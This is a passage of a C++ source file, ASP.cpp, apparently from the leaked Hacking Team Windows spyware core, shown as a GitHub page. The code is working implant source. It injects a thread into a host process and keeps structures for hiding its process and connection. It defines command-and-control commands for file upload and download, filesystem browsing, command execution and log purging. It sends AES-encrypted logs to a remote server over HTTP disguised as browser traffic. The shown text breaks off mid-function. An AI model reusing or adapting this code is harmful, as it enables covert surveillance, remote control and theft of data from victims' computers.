forked from hackedteam/core-win32
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathASP.cpp
1786 lines (1471 loc) · 52.5 KB
/
ASP.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
#include "common.h"
#include "H4-DLL.h"
#include "ASP.h"
#include "AM_Core.h"
#include "UnHookClass.h"
#include <winhttp.h>
#include <stdio.h>
#include <shlwapi.h>
#include "sha1.h"
#include "aes_alg.h"
#include <string.h>
#include "x64.h"
#define ASP_SLEEP_TIME 20
#define ASP_START_TIMEOUT 60000 // un minuto di attesa per far inizializzare il processo host ASP
#define ASP_CONNECT_TIMEOUT 10000 // timeout prima di determinare che il server non e' raggiungibile
#define ASP_RESOLVE_TIMEOUT 10000
#define ASP_SEND_TIMEOUT 600000
#define ASP_RECV_TIMEOUT 600000
#define WIRESPEED (100*1024*1024/8)
HINTERNET asp_global_request = 0; // Handle usato dalle winhttp per inviare/ricevere dati
BYTE asp_global_session_key[16];
extern char SHARE_MEMORY_ASP_COMMAND_NAME[MAX_RAND_NAME];
// --- Altri prototipi usati dal thread ASP ---
typedef void (__stdcall *ASP_MainLoop_t) (char *);
typedef void (__stdcall *ExitProcess_T) (UINT);
extern void HidePEB(HMODULE);
#define HOSTNAMELEN 256
typedef struct {
HMCommonDataStruct pCommon; // Necessario per usare HM_sCreateHookA. Definisce anche le funzioni come LoadLibrary
char cDLLHookName[DLLNAMELEN]; // Nome della dll principale ("H4.DLL")
char cASPServer[HOSTNAMELEN]; // server ASP
char cASPMainLoop[64]; // Nome della funzione ASP
ExitProcess_T pExitProcess;
} ASPThreadDataStruct;
ASPThreadDataStruct ASPThreadData;
// Struttura per il passaggio dei comandi ASP in shared memory
#define ASP_SETUP 0 // Setup (primo comando da inviare)
#define ASP_AUTH 1 // Auth
#define ASP_IDBCK 2 // ID
#define ASP_AVAIL 3 // Lista availables
#define ASP_NCONF 4 // Nuova configurazione
#define ASP_UPLO 5 // Prende un upload
#define ASP_DOWN 6 // Prende le richieste di download
#define ASP_FSYS 7 // Prende le richieste di filesystem browse
#define ASP_SLOG 8 // Invia un log al server
#define ASP_UPGR 9 // Prende un upgrade
#define ASP_BYE 10 // Chiude la sessione
#define ASP_SSTAT 11 // Invia info sui log che sta per spedire
#define ASP_PURGE 12 // Riceve i dati per il purge dei log
#define ASP_CMDE 13 // Prende le richieste di command execution
// XXXXX da definire....
#define MAX_ASP_IN_PARAM 1024
#define MAX_ASP_OUT_PARAM 1024*1024
#define ASP_NOP 0 // Nessuna operazione da eseguire
#define ASP_FETCH 1 // ASP host deve eseguire l'action
#define ASP_DONE 2 // ASP host ha finito con successo
#define ASP_ERROR 3 // ASP host ha finito con un errore
typedef struct {
DWORD action; // Azione da eseguire
DWORD status; // stato dell'operazione (va settato per ultimo)
DWORD out_command; // valore di ritorno del comando sul server
BYTE in_param[MAX_ASP_IN_PARAM];
DWORD in_param_len;
BYTE out_param[MAX_ASP_OUT_PARAM]; // output del comando sul server
DWORD out_param_len;
} ASP_IPCCommandDataStruct;
/*#define REQUEST_ARRAY_LEN 19
WCHAR *wRequest_array[] = {
L"/pagead/show_ads.js",
L"/licenses/by-nc-nd/2.5",
L"/css-validator",
L"/stats.asp?site=actual",
L"/static/js/common/jquery.js",
L"/cgi-bin/m?ci=ads&cg=0",
L"/rss/homepage.xml",
L"/index.shtml?refresh",
L"/static/css/common.css",
L"/flash/swflash.cab#version=8,0,0,0",
L"/js/swfobjectLivePlayer.js?v=10-57-13",
L"/css/library/global.css",
L"/rss/news.rss",
L"/comments/new.js",
L"/feed/view?id=1&type=channel",
L"/ajax/MessageComposerEndpoint.php?__a=1",
L"/safebrowsing/downloads?client=navclient",
L"/extern_js/f/TgJFbiseMTg4LCsw2jgAQIACWFACU6rCA7RidA/qFso89FTd1c.js",
L"/search.php"
};*/
#define REQUEST_ARRAY_LEN 1
WCHAR *wRequest_array[] = {
L"/index.jsp"
};
HANDLE ASP_HostProcess = NULL; // Processo che gestisce ASP
ASP_IPCCommandDataStruct *ASP_IPC_command = NULL; // Area di shared memory per dare comandi al processo ASP
HANDLE hASPIPCcommandfile = NULL; // File handle della shared memory dei comandi
connection_hide_struct connection_hide = NULL_CONNETCION_HIDE_STRUCT; // struttura per memorizzare il pid da nascondere
pid_hide_struct pid_hide = NULL_PID_HIDE_STRUCT; // struttura per memorizzare la connessione da nascondere
HINTERNET hRequest = 0; // Handle usato dalle winhttp per inviare/ricevere dati
DWORD pub_key_size = 0; // Dimensione della chiave pubblica nel certificato server
///////////////////////////////////////////
// Funzioni per lanciare il thread ASP //
///////////////////////////////////////////
// Thread remoto iniettato nel processo ASP host
DWORD ASP_HostThread(ASPThreadDataStruct *pDataThread)
{
HMODULE hASPDLL;
ASP_MainLoop_t pASP_MainLoop;
INIT_WRAPPER(BYTE);
hASPDLL = pDataThread->pCommon._LoadLibrary(pDataThread->cDLLHookName);
if (!hASPDLL)
pDataThread->pExitProcess(0);
pASP_MainLoop = (ASP_MainLoop_t)pDataThread->pCommon._GetProcAddress(hASPDLL, pDataThread->cASPMainLoop);
// Invoca il ciclo principale di ASP
if (pASP_MainLoop)
pASP_MainLoop(pDataThread->cASPServer);
// Se il ciclo principale esce per qualche errore
// il processo host viene chiuso
pDataThread->pExitProcess(0);
return 0;
}
// Lancia il thread di ASP nel processo dwPid
BOOL ASP_StartASPThread(DWORD dwPid)
{
HANDLE hThreadRem;
DWORD dwThreadId;
if (!ASP_HostProcess)
return FALSE;
// Alloca dati e funzioni del thread ASP nel processo dwPid
if(HM_sCreateHookA(dwPid, NULL, NULL, (BYTE *)ASP_HostThread, 600, (BYTE *)&ASPThreadData, sizeof(ASPThreadData)) == NULL)
return FALSE;
if ( !(hThreadRem = HM_SafeCreateRemoteThread(ASP_HostProcess, NULL, 8192,
(LPTHREAD_START_ROUTINE)ASPThreadData.pCommon.dwHookAdd,
(LPVOID)ASPThreadData.pCommon.dwDataAdd, 0, &dwThreadId)) )
return FALSE;
// Non e' necessario avere un handle aperto sul
// thread di ASP
CloseHandle(hThreadRem);
return TRUE;
}
// Inizializza le strutture necessarie ad ASP
// Torna 0 se ha successo
DWORD ASP_Setup(char *asp_server)
{
HMODULE hMod;
VALIDPTR(hMod = GetModuleHandle("KERNEL32.DLL"));
// API utilizzate dal thread remoto.... [KERNEL32.DLL]
VALIDPTR(ASPThreadData.pCommon._LoadLibrary = (LoadLibrary_T) HM_SafeGetProcAddress(hMod, "LoadLibraryA"));
VALIDPTR(ASPThreadData.pCommon._GetProcAddress = (GetProcAddress_T) HM_SafeGetProcAddress(hMod, "GetProcAddress"));
VALIDPTR(ASPThreadData.pExitProcess = (ExitProcess_T) HM_SafeGetProcAddress(hMod, "ExitProcess"));
HM_CompletePath(H4DLLNAME, ASPThreadData.cDLLHookName);
_snprintf_s(ASPThreadData.cASPServer, sizeof(ASPThreadData.cASPServer), _TRUNCATE, "%s", asp_server);
_snprintf_s(ASPThreadData.cASPMainLoop, sizeof(ASPThreadData.cASPMainLoop), _TRUNCATE, "PPPFTBBP07");
return 0;
}
////////////////////////////////////
// Funzioni IPC command per ASP //
////////////////////////////////////
// Usata dall'host ASP per attaccarsi alla shared memory
BOOL ASP_IPCAttach()
{
HANDLE h_file = FNC(OpenFileMappingA)(FILE_MAP_ALL_ACCESS, FALSE, SHARE_MEMORY_ASP_COMMAND_NAME);
// Riutilizza ASP_IPC_command tanto non l'host ASP non lo condivide
// con il core
if (h_file)
ASP_IPC_command = (ASP_IPCCommandDataStruct *)FNC(MapViewOfFile)(h_file, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(ASP_IPCCommandDataStruct));
if (ASP_IPC_command)
return TRUE;
return FALSE;
}
// Inizializza nel core la shared memory per ASP
BOOL ASP_IPCSetup()
{
hASPIPCcommandfile = FNC(CreateFileMappingA)(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, sizeof(ASP_IPCCommandDataStruct), SHARE_MEMORY_ASP_COMMAND_NAME);
if (hASPIPCcommandfile)
ASP_IPC_command = (ASP_IPCCommandDataStruct *)FNC(MapViewOfFile)(hASPIPCcommandfile, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(ASP_IPCCommandDataStruct));
if (ASP_IPC_command) {
memset(ASP_IPC_command, 0, sizeof(ASP_IPCCommandDataStruct));
return TRUE;
}
return FALSE;
}
// Chiude nel core la shared memory per ASP
void ASP_IPCClose()
{
if (ASP_IPC_command) {
FNC(UnmapViewOfFile)(ASP_IPC_command);
ASP_IPC_command = NULL;
}
SAFE_CLOSE_HANDLE(hASPIPCcommandfile);
}
/////////////////////////
// Funzioni accessorie //
/////////////////////////
// Parsa una risposta del server
// Ritorna un puntatore al body del messaggio
// Torna NULL in caso di fallimento
BYTE *ParseResponse(BYTE *ptr, DWORD len, DWORD *command, DWORD *message_len)
{
BYTE *msg_ptr;
BYTE iv[16];
aes_context crypt_ctx;
SHA1Context sha;
DWORD i;
// Check di consistenza del pacchetto
if (len < sizeof(DWORD)*2)
return NULL;
// Decifra il pacchetto
aes_set_key( &crypt_ctx, (BYTE *)asp_global_session_key, 128);
memset(iv, 0, sizeof(iv));
aes_cbc_decrypt(&crypt_ctx, iv, ptr, ptr, len);
// Legge il comando di risposta
msg_ptr = ptr;
memcpy(command, msg_ptr, sizeof(DWORD));
msg_ptr += sizeof(DWORD);
SHA1Reset(&sha);
if (*command == PROTO_OK) {
// legge la lunghezza
memcpy(message_len, msg_ptr, sizeof(DWORD));
msg_ptr += sizeof(DWORD);
// Check della lunghezza
if (len <= sizeof(DWORD)*2 + *message_len + SHA_DIGEST_LENGTH)
return NULL;
// Calcola l'hash
SHA1Input(&sha, (BYTE *)ptr, sizeof(DWORD)*2 + *message_len);
} else if (*command == PROTO_NO) {
// Check della lunghezza
*message_len = 0;
if (len <= sizeof(DWORD) + SHA_DIGEST_LENGTH)
return NULL;
// Calcola l'hash
SHA1Input(&sha, (BYTE *)ptr, sizeof(DWORD));
} else
return NULL;
// Verifica lo sha1
if (!SHA1Result(&sha))
return NULL;
for (i=0; i<5; i++)
sha.Message_Digest[i] = ntohl(sha.Message_Digest[i]);
if (memcmp(msg_ptr + *message_len, sha.Message_Digest, SHA_DIGEST_LENGTH))
return NULL;
return msg_ptr;
}
// Prende un buffer e lo dumpa su file
BOOL WriteBufferOnFile(WCHAR *file_path, BYTE *buffer, DWORD buf_len)
{
HANDLE hfile;
DWORD n_read;
if (buffer == NULL || file_path == NULL)
return FALSE;
hfile = CreateFileW(file_path, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
while (buf_len > 0) {
if (!WriteFile(hfile, buffer, buf_len, &n_read, NULL) || n_read==0) {
CloseHandle(hfile);
return FALSE;
}
buffer += n_read;
buf_len -= n_read;
}
CloseHandle(hfile);
return TRUE;
}
// Genera una sequenza di byte a caso
void rand_bin_seq(BYTE *buffer, DWORD buflen)
{
DWORD i;
static BOOL first_time = TRUE;
if (first_time) {
srand(GetTickCount());
first_time = FALSE;
}
for (i=0; i<buflen; i++)
buffer[i] = rand();
}
// Invia il buffer rispettando il limite di banda di byte_per_second
BOOL BandSafeDataSend(BYTE *buf, DWORD len, DWORD byte_per_second)
{
#define SAMPLING_RATE 100
DWORD byte_per_sample = byte_per_second/SAMPLING_RATE;
DWORD byte_sent = 0, byte_to_send;
DWORD time_start, time_stop, time_expected;
wchar_t _wheaders[1024];
// Verifica che non abbia usato un byte_per_second troppo basso
if (byte_per_sample == 0)
byte_per_sample = 1;
if (byte_per_second == 0)
byte_per_second = 1;
// Inizia la richiesta
swprintf_s(_wheaders, L"%ls %d", L"Content-Length:", len);
if (!FNC(WinHttpAddRequestHeaders)(asp_global_request, _wheaders, -1, WINHTTP_ADDREQ_FLAG_REPLACE | WINHTTP_ADDREQ_FLAG_ADD))
return FALSE;
if (!FNC(WinHttpSendRequest)(asp_global_request, WINHTTP_NO_ADDITIONAL_HEADERS, -1L, WINHTTP_NO_REQUEST_DATA, 0, len, NULL))
return FALSE;
// Cicla finche' non spedisce tutti i byte
while (byte_sent < len) {
// Vede se i byte ancora da mandare eccedono
// quelli inviabili in un "sample" di tempo
byte_to_send = len - byte_sent;
if (byte_to_send > byte_per_sample)
byte_to_send = byte_per_sample;
time_start = FNC(GetTickCount)();
// byte_to_send sono quelli da inviare in questo sample
// (dopo la funzione sono quelli effettivamente inviati)
if (!FNC(WinHttpWriteData)(asp_global_request, buf + byte_sent, byte_to_send, &byte_to_send))
return FALSE;
// Calcola quanti millisecondi avrebbe dovuto impiegare questa spedizione
time_expected = (byte_to_send*1000) / byte_per_second;
time_stop = FNC(GetTickCount)();
// Se il tempo atteso e' maggiore di quello passato,
// aspetta i millisecondi rimanenti
// Se arriva al riavvolgimento (time_stop < time_start), l'expected
// sara' sicuramente minore.
if (time_expected > (time_stop - time_start))
Sleep( time_expected - (time_stop - time_start));
// Aggiorna i byte inviati
byte_sent += byte_to_send;
}
return TRUE;
}
// Invia una richiesta HTTP e legge la risposta
// Alloca il buffer con la risposta (che va poi liberato dal chiamante)
BOOL HttpTransaction(BYTE *s_buffer, DWORD sbuf_len, BYTE **r_buffer, DWORD *response_len, DWORD byte_per_second)
{
WCHAR szContentLength[32];
DWORD cch = sizeof(szContentLength);
DWORD dwHeaderIndex = WINHTTP_NO_HEADER_INDEX;
DWORD dwContentLength;
DWORD n_read;
BYTE *ptr;
// Invia la richiesta
if (!BandSafeDataSend(s_buffer, sbuf_len, byte_per_second))
return FALSE;
// Legge la risposta
if(!FNC(WinHttpReceiveResponse)(asp_global_request, 0))
return FALSE;
if (!WinHttpQueryHeaders(asp_global_request, WINHTTP_QUERY_CONTENT_LENGTH, NULL, &szContentLength, &cch, &dwHeaderIndex))
return FALSE;
dwContentLength = _wtoi(szContentLength);
if (dwContentLength == 0)
return FALSE;
*r_buffer = (BYTE *)malloc(dwContentLength);
if (! (*r_buffer))
return FALSE;
ptr = *r_buffer;
*response_len = 0;
do {
if(!FNC(WinHttpReadData)(asp_global_request, ptr, dwContentLength, &n_read)) {
SAFE_FREE(*r_buffer);
return FALSE;
}
*response_len += n_read;
dwContentLength -= n_read;
ptr += n_read;
} while(n_read>0 && dwContentLength>0);
// Arrotonda per eliminare i byte aggiunti per padding random
*response_len -= ((*response_len)%16);
return TRUE;
}
// Crea il buffer da inviare per un comando piu' messaggio
// il buffer ritornato va liberato
BYTE *PreapareCommand(DWORD command, BYTE *message, DWORD msg_len, DWORD *ret_len)
{
SHA1Context sha;
DWORD tot_len, pad_len, i;
BYTE *buffer, *ptr;
aes_context crypt_ctx;
DWORD rand_pad_len = 0;
BYTE iv[16];
if (ret_len)
*ret_len = 0;
rand_pad_len = (rand()%15)+1;
// arrotonda
pad_len = tot_len = sizeof(DWORD) + msg_len + SHA_DIGEST_LENGTH;
tot_len/=16;
tot_len++;
tot_len*=16;
pad_len = tot_len - pad_len;
if (!(buffer = (BYTE *)malloc(tot_len + rand_pad_len)))
return NULL;
SHA1Reset(&sha);
SHA1Input(&sha, (BYTE *)&command, sizeof(DWORD));
if (msg_len)
SHA1Input(&sha, (BYTE *)message, msg_len);
if (!SHA1Result(&sha)) {
free(buffer);
return NULL;
}
for (i=0; i<5; i++)
sha.Message_Digest[i] = ntohl(sha.Message_Digest[i]);
// scrive il buffer
memset(buffer, pad_len, tot_len);
ptr = buffer;
memcpy(ptr, &command, sizeof(DWORD));
ptr += sizeof(DWORD);
if (msg_len)
memcpy(ptr, message, msg_len);
ptr += msg_len;
memcpy(ptr, sha.Message_Digest, sizeof(sha.Message_Digest));
// cifra il tutto
aes_set_key( &crypt_ctx, (BYTE *)asp_global_session_key, 128);
memset(iv, 0, sizeof(iv));
aes_cbc_encrypt(&crypt_ctx, iv, buffer, buffer, tot_len);
rand_bin_seq(buffer + tot_len, rand_pad_len);
if (ret_len)
*ret_len = tot_len + rand_pad_len;
return buffer;
}
// Formatta il buffer per l'invio di un log
// Non usa PrepareCommand per evitare di dover allocare due volte la dimensione del file
BYTE *PrepareFile(WCHAR *file_path, DWORD *ret_len)
{
SHA1Context sha;
DWORD tot_len, pad_len, i;
BYTE *buffer, *ptr;
aes_context crypt_ctx;
DWORD msg_len, bytes_left;
BYTE iv[16];
DWORD command = PROTO_LOG;
HANDLE hfile;
DWORD n_read;
DWORD rand_pad_len = 0;
if (ret_len)
*ret_len = 0;
rand_pad_len = (rand()%15)+1;
// Legge la lunghezza del body del file
hfile = CreateFileW(file_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
if (hfile == INVALID_HANDLE_VALUE)
return FALSE;
msg_len = GetFileSize(hfile, NULL);
if (msg_len == INVALID_FILE_SIZE) {
CloseHandle(hfile);
return NULL;
}
// arrotonda
pad_len = tot_len = sizeof(DWORD)*2 + msg_len + SHA_DIGEST_LENGTH;
tot_len/=16;
tot_len++;
tot_len*=16;
pad_len = tot_len - pad_len;
// alloca il buffer
if (!(buffer = (BYTE *)malloc(tot_len + rand_pad_len))) {
CloseHandle(hfile);
return NULL;
}
// scrive il buffer
memset(buffer, pad_len, tot_len);
ptr = buffer;
memcpy(ptr, &command, sizeof(DWORD));
ptr += sizeof(DWORD);
memcpy(ptr, &msg_len, sizeof(DWORD));
ptr += sizeof(DWORD);
// copia il contenuto del file
bytes_left = msg_len;
while (bytes_left > 0) {
if (!ReadFile(hfile, ptr, bytes_left, &n_read, NULL) || n_read==0) {
CloseHandle(hfile);
return NULL;
}
ptr += n_read;
bytes_left -= n_read;
}
CloseHandle(hfile);
// Calcola lo sha1 sulla prima parte del buffer
SHA1Reset(&sha);
SHA1Input(&sha, buffer, sizeof(DWORD)*2 + msg_len);
if (!SHA1Result(&sha)) {
free(buffer);
return NULL;
}
// ..lo scrive
for (i=0; i<5; i++)
sha.Message_Digest[i] = ntohl(sha.Message_Digest[i]);
memcpy(ptr, sha.Message_Digest, sizeof(sha.Message_Digest));
// cifra il tutto
aes_set_key( &crypt_ctx, (BYTE *)asp_global_session_key, 128);
memset(iv, 0, sizeof(iv));
aes_cbc_encrypt(&crypt_ctx, iv, buffer, buffer, tot_len);
rand_bin_seq(buffer + tot_len, rand_pad_len);
if (ret_len)
*ret_len = tot_len + rand_pad_len;
return buffer;
}
// Ritorna la stringa pascalizzata
// il buffer ritornato va liberato
BYTE *PascalizeString(WCHAR *string, DWORD *retlen)
{
DWORD len;
BYTE *buffer;
len = (wcslen(string)+1)*sizeof(WCHAR);
buffer = (BYTE *)malloc(len+sizeof(DWORD));
if (!buffer)
return NULL;
ZeroMemory(buffer, len+sizeof(DWORD));
memcpy(buffer, &len, sizeof(DWORD));
wcscpy_s((WCHAR *)(buffer+sizeof(DWORD)), len/sizeof(WCHAR), string);
*retlen = len+sizeof(DWORD);
return buffer;
}
// De-pascalizza la stringa (alloca la stringa)
WCHAR *UnPascalizeString(BYTE *data, DWORD *retlen)
{
*retlen = *((DWORD *)data);
data += sizeof(DWORD);
return wcsdup((WCHAR *)data);
}
// Risolve server_url
BOOL H_ASP_ResolveName(char *server_url, char *addr_to_connect, DWORD buflen)
{
struct hostent *hAddress;
char *addr_ptr;
WORD wVersionRequested;
WSADATA wsaData;
// E' gia' un indirizzo IP
if (inet_addr(server_url) != INADDR_NONE) {
_snprintf_s(addr_to_connect, buflen, _TRUNCATE, "%s", server_url);
return TRUE;
}
wVersionRequested = MAKEWORD( 2, 2 );
if ( WSAStartup( wVersionRequested, &wsaData )!= 0 )
return FALSE;
hAddress = gethostbyname(server_url);
WSACleanup();
if (!hAddress || !(addr_ptr = inet_ntoa(*(struct in_addr*)hAddress->h_addr)))
return FALSE;
_snprintf_s(addr_to_connect, buflen, _TRUNCATE, "%s", addr_ptr);
return TRUE;
}
// XXX Mancano tutte le GlobalFree per le strutture WinHTTP
// ma tanto la funzione viene richiamata una volta sola dal
// processo e poi muore
BOOL H_ASP_WinHTTPSetup(char *server_url, char *addr_to_connect, DWORD buflen, DWORD *port_to_connect)
{
WINHTTP_CURRENT_USER_IE_PROXY_CONFIG ProxyConfig;
WINHTTP_PROXY_INFO ProxyInfoTemp, ProxyInfo;
WINHTTP_AUTOPROXY_OPTIONS OptPAC;
DWORD dwOptions = 0;
WCHAR _wHostProto[256];
WCHAR _wHost[256];
HINTERNET hSession = 0, hConnect = 0;
char *addr_ptr;
char *types[] = { "*\x0/\x0*\x0",0 };
BOOL isProxy = FALSE;
swprintf_s(_wHost, L"%S", server_url);
swprintf_s(_wHostProto, L"http://%S", server_url);
ZeroMemory(&ProxyInfo, sizeof(ProxyInfo));
ZeroMemory(&ProxyConfig, sizeof(ProxyConfig));
// Crea una sessione per winhttp.
hSession = FNC(WinHttpOpen)( L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", WINHTTP_ACCESS_TYPE_NO_PROXY, 0, WINHTTP_NO_PROXY_BYPASS, 0);
// Cerca nel registry le configurazioni del proxy
if (hSession && FNC(WinHttpGetIEProxyConfigForCurrentUser)(&ProxyConfig)) {
// I metodi di configurazione sono nell'ordine inverso
// rispetto a come li considera internet explorer
// In questo modo l'ultimo che riesce a trovare un proxy
// verra' utilizzato.
if (ProxyConfig.lpszProxy) {
// Proxy specificato
ProxyInfo.lpszProxy = ProxyConfig.lpszProxy;
ProxyInfo.dwAccessType = WINHTTP_ACCESS_TYPE_NAMED_PROXY;
ProxyInfo.lpszProxyBypass = NULL;
}
if (ProxyConfig.lpszAutoConfigUrl) {
// Script proxy pac
OptPAC.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL;
OptPAC.lpszAutoConfigUrl = ProxyConfig.lpszAutoConfigUrl;
OptPAC.dwAutoDetectFlags = 0;
OptPAC.fAutoLogonIfChallenged = TRUE;
OptPAC.lpvReserved = 0;
OptPAC.dwReserved = 0;
if (FNC(WinHttpGetProxyForUrl)(hSession ,_wHostProto, &OptPAC, &ProxyInfoTemp))
memcpy(&ProxyInfo, &ProxyInfoTemp, sizeof(ProxyInfo));
}
if (ProxyConfig.fAutoDetect) {
// Autodetect proxy
OptPAC.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT;
OptPAC.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A;
OptPAC.fAutoLogonIfChallenged = TRUE;
OptPAC.lpszAutoConfigUrl = NULL;
OptPAC.lpvReserved = 0;
OptPAC.dwReserved = 0;
if (FNC(WinHttpGetProxyForUrl)(hSession ,_wHostProto, &OptPAC, &ProxyInfoTemp))
memcpy(&ProxyInfo, &ProxyInfoTemp, sizeof(ProxyInfo));
}
// Se ha trovato un valore sensato per il proxy, allora ritorna
if (ProxyInfo.lpszProxy) {
isProxy = TRUE;
FNC(WinHttpSetOption)(hSession, WINHTTP_OPTION_PROXY, &ProxyInfo, sizeof(ProxyInfo));
// Parsa la stringa per separare la porta
_snprintf_s(addr_to_connect, buflen, _TRUNCATE, "%S", ProxyInfo.lpszProxy);
if (addr_ptr = strchr(addr_to_connect, (int)':')) {
*addr_ptr = 0;
addr_ptr++;
sscanf_s(addr_ptr, "%d", port_to_connect);
} else
*port_to_connect = 8080;
if (!H_ASP_ResolveName(addr_to_connect, addr_to_connect, buflen))
return FALSE;
}
}
// Se ci connettiamo senza proxy
if (!isProxy) {
*port_to_connect = 80; // se ci stiamo connettendo diretti usiamo di default la porta 80
if (!H_ASP_ResolveName(server_url, addr_to_connect, buflen))
return FALSE;
swprintf_s(_wHost, L"%S", addr_to_connect); // In questo caso mette nella richiesta winhttp direttamente l'indirizzo IP
}
// Definisce il target
if ( !(hConnect = FNC(WinHttpConnect)( hSession, (LPCWSTR) _wHost, INTERNET_DEFAULT_HTTP_PORT, 0)))
return FALSE;
// Crea la richiesta
if ( !(asp_global_request = FNC(WinHttpOpenRequest)( hConnect, L"POST", wRequest_array[rand()%REQUEST_ARRAY_LEN], NULL, WINHTTP_NO_REFERER, (LPCWSTR *) types, 0)) )
return FALSE;
FNC(WinHttpSetTimeouts)(asp_global_request, ASP_RESOLVE_TIMEOUT, ASP_CONNECT_TIMEOUT, ASP_SEND_TIMEOUT, ASP_RECV_TIMEOUT);
return TRUE;
}
//////////////////////////////////////////////
// Funzioni che eseguono i comandi del core //
//////////////////////////////////////////////
#define AUTH_REAL_LEN 112
// Esegue il passi di AUTH
BOOL H_ASP_Auth(char *signature, DWORD sig_len, char *backdoor_id, DWORD bid_len, char *instance, DWORD inst_len, char *subtype, DWORD sub_len, char *conf_key, DWORD ckey_len, DWORD *response_command)
{
BYTE buffer[AUTH_REAL_LEN+16];
BYTE *response;
BYTE *ptr;
BYTE client_key[16];
BYTE server_key[16];
BYTE nonce_payload[16];
BYTE sha1buf[256];
SHA1Context sha;
DWORD response_len;
DWORD i;
BYTE iv[16];
aes_context crypt_ctx;
DWORD rand_pad_len = 0;
*response_command = PROTO_NO;
// Costruisce il buffer
ZeroMemory(buffer, sizeof(buffer));
rand_bin_seq(client_key, 16);
rand_bin_seq(nonce_payload, 16);
SHA1Reset(&sha);
ZeroMemory(sha1buf, sizeof(sha1buf));
memcpy(sha1buf, backdoor_id, bid_len);
SHA1Input(&sha, sha1buf, 16);
ZeroMemory(sha1buf, sizeof(sha1buf));
memcpy(sha1buf, instance, inst_len);
SHA1Input(&sha, sha1buf, 20);
ZeroMemory(sha1buf, sizeof(sha1buf));
memcpy(sha1buf, subtype, sub_len);
SHA1Input(&sha, sha1buf, 16);
ZeroMemory(sha1buf, sizeof(sha1buf));
memcpy(sha1buf, conf_key, ckey_len);
SHA1Input(&sha, sha1buf, 16);
if (!SHA1Result(&sha))
return FALSE;
ptr = buffer;
memcpy(ptr, client_key, 16);
ptr+=16;
